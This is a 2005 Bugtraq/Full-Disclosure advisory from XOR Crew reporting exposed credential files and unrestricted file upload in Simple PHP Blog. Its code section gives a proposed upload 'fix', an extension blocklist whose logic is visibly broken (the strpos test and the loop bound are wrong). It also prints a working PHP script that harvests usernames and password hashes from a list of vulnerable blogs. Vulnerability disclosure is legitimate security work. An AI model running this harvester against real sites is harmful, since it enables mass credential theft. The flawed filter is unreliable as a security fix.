lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 25 Aug 2005 22:27:27 -0400
From: Scott Dewey <wr0ck@...crew.net>
To: bugtraq@...urityfocus.com,  full-disclosure@...ts.grok.org.uk
Subject: Simple PHP Blog File Upload and User Credentials
	Exposure Vulnerabilities


===============================================================================
XOR Crew :: Security Advisory                                  8/25/2005
===============================================================================
Simple PHP Blog File Upload and User Credentials Exposure 
Vulnerabilities
===============================================================================
http://www.xorcrew.net/
===============================================================================

:: Summary

       Vendor       :  Alexander Palmo
       Vendor Site  :  http://www.simplephpblog.com/
       Product(s)   :  Simple PHP Blog (SPHPBlog)
       Version(s)   :  All
       Severity     :  Medium/High
       Release Date :  8/25/2005
       Impact       :  Unauthorized file upload,
                    :  Exposure of user credentials.
       Credits      :  ReZEN (rezen (a) xorcrew (.) net),
                    :  0xception (oxception (a) xorcrew (.) net).

===============================================================================

I. Description

Simple PHP Blog is PHP (4 or greater) based blogging application that 
was written with simplicity of installation and maintenance in mind. 
Unlike other blog software, there is almost no setup - just unzip and 
copy. It is a dead-simple blog that doesn't require a database. It uses 
flat text files, and looks nice.

===============================================================================

II. Synopsis

The Simple PHP Blog application has two vulnerabilities present within 
it that when used together, can allow an attacker to arbitrarily upload 
files to the server. The first vulnerability has to do with insecure 
default file permissions and placement of config.txt and password.txt, 
and leaves both files fully accessible to unauthorized users. This
problem was realized earlier in February, unknown to us. The fix for 
that is to simply `.htaccess' the config directory of the blogger's 
directory tree.

The second of the two vulnerabilities lies within the image upload 
system provided to (il?)legitimate, logged-in users. There is no image 
validation function in the blogger to stop an unauthorized user from 
uploading any file they want to to the server. The vendor has been 
contacted and has failed to reply. This is a problem that has yet to be 
addressed.

===============================================================================

III. Code/PoC

Insecure file upload - fix by ReZEN:

Add to upload_img_cgi.php at line 19:

-----BEGIN-----

$no = array( "exe", "pl", "php", "php3", "php4", "php5", "phps", "asp",
"cgi", "html", "htm" );
for( $i = 0; $i < 10; $i++ )
  {
   if( strpos( $uploadfile, $no[$i] ) >= 0 )
    {
     echo "That filetype is not allowed";
     exit;
    }
  }

------END------

PoC code to harvest usernames and passwords from vulnerable blogs,
given a list of URLs:

-----BEGIN-----

<?php
/********************************************

Stupid Script to grab usernames
and password hashes form Simple PHP Blog
Coded by ReZEN of XOR
http://www.xorcrew.net/ReZEN
ReZEN (AT) xorcrew (DOT) net
Greetz: wr0ck, 0xception, tendo, ld, smirks,
ajax, gml(i miss you), Infintiy, my friends
My loving parents =] and anyone else i forgot

*********************************************/

$pdir = "config/password.txt";
$udir = "config/config.txt";
$urllist = "urls.txt";  //List of Blog Urls
$i = 0;
$fp = fopen( $urllist, 'rb' );

if( !$fp )
  {
   echo "Unable to open: ".$urllist."<br><br>";
  }
else
  {
   while ( !feof ( $fp ) )
    {
     $url[$i] = fgets ( $fp, 1000 );
     $url[$i] = trim( $url[$i] );
     $i = $i + 1;
    }
   $limit = $i;
   fclose( $fp );
  }

for( $i = 0; $i < $limit; $i++ )
  {
   $fp = fopen( $url[$i].$pdir, 'rb' );
   if ( !$fp )
    {
     echo "Unable to get: ".$url.$pdir."<br><br>";
    }
   else
    {
     $pass = fread($fp, 1000);
     fclose($fp);
    }

   $fp = fopen( $url[$i].$udir, 'rb' );

   if (!$fp)
    {
     echo "Unable to get: ".$url.$udir."<br><br>";
    }
   else
    {
     $conf = fread( $fp, 1000 );
     fclose( $fp );
    }

   $user = explode( "|", $conf );
   echo $user[1].":".$pass."<br>";
   $user = "";
   $pass = "";
  }
?>

------END------

===============================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, k&k, seeprompt, the rest.

===============================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists